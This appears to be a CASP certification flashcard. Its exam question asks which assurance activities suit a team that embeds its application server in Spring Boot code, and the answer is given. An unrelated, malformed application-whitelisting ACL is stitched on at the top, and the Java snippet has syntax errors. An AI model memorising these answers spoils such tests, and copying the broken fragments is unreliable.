
``` ACL APPROVED_MD5 (app1.exe, app2.exe, app3.exe) 048673AAC037CBAD1FAB10033794AA29, 0583AB565F4E2BCFAB10583BD337D105) PERMIT APPROVED_MD5 DENY * ```

The security architect within a large development company has mandated two additional security assurance activities be performed on all new projects that require application development: 1. Administrator-focused application lockdown guides to be created and used for externally accessible services 2. Configuration reviews to be performed on externally accessible services A developer team is creating a new externally accessible web application. The team has started using an "infrastructure as code" concept by embedding the application server process within the application code base. An example fragment of the application server properties is show below ... import org.springframework.http.*; import org.springframework.boot.*; ... @WebAppConfiguration public class WebServer { ... @value ("$(local.server.port)") private int serverPort = 80; ... public void startWebServer () { this.base = new URL (https://localhost: + serverPort + "/"); ... } ... } @Controller public class LoginController ... @RequestMapping(value = " /login", method = RequestMethod.GET); ... { Given the development approach, which of the following new security assurance activities should the security architect mandate as a replacement for the existing activities? (Select TWO).

Developer-focused application service lockdown guides Code review that covers application server properties and configuration

CASP Flashcards

(107 cards)